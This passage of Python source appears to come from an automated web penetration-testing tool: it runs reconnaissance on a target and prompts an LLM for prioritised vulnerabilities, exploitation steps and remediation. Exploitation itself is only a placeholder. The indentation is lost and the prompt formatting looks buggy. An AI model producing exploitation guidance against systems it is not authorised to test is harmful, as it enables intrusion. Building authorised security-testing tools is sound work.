# Phase 1: Web Reconnaissance
logger.info("Phase 1: Web Reconnaissance (WebPentestAgent)")
web_recon_output = self.web_recon.analyze(target)
results["web_recon_results"] = web_recon_output
# Phase 2: Vulnerability Analysis (AI-powered)
logger.info("Phase 2: AI-powered Vulnerability Analysis")
# This part will be improved later with more detailed vulnerability detection in WebRecon
# For now, it will look for findings reported by WebRecon
potential_vulnerabilities = self._identify_potential_web_vulnerabilities(web_recon_output)
if potential_vulnerabilities:
results["vulnerability_analysis"] = potential_vulnerabilities
ai_vulnerability_analysis = self._ai_analyze_web_vulnerabilities(potential_vulnerabilities, target)
results["ai_analysis"]["vulnerability_insights"] = ai_vulnerability_analysis
else:
logger.info("No immediate web vulnerabilities identified by WebRecon.")
# Phase 3: Web Exploitation (Placeholder for now)
# This will integrate with exploitation tools later.
results["status"] = "completed"
logger.info("Web pentest phase completed")
except Exception as e:
logger.error(f"Error during web pentest: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _identify_potential_web_vulnerabilities(self, web_recon_output: Dict) -> List[Dict]:
"""
Identifies potential web vulnerabilities based on WebRecon output.
This is a placeholder and will be enhanced as WebRecon improves.
"""
vulnerabilities = []
if "vulnerabilities" in web_recon_output:
vulnerabilities.extend(web_recon_output["vulnerabilities"])
return vulnerabilities
def _ai_analyze_web_vulnerabilities(self, vulnerabilities: List[Dict], target: str) -> Dict:
"""Uses AI to analyze identified web vulnerabilities."""
prompt = self.llm.get_prompt(
"web_recon",
"ai_analysis_user",
default=f"""
Analyze the following potential web vulnerabilities identified on {target} and provide insights:
Vulnerabilities: {json.dumps(vulnerabilities, indent=2)}
Provide:
1. Prioritized list of vulnerabilities
2. Recommended exploitation steps for each (if applicable)
3. Potential impact
4. Remediation suggestions
Response in JSON format with actionable recommendations.
"""
)
system_prompt = self.llm.get_prompt(
"web_recon",
"ai_analysis_system",
default="""You are an expert web penetration tester and security analyst.
Provide precise analysis of web vulnerabilities and practical advice for exploitation and remediation."""
)
try:
# Format the user prompt with recon_data
formatted_prompt = prompt.format(
target=target,
vulnerabilities_json=json.dumps(vulnerabilities, indent=2)
)
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI web vulnerability analysis error: {e}")
return {"error": str(e), "raw_response": response if 'response' in locals() else None}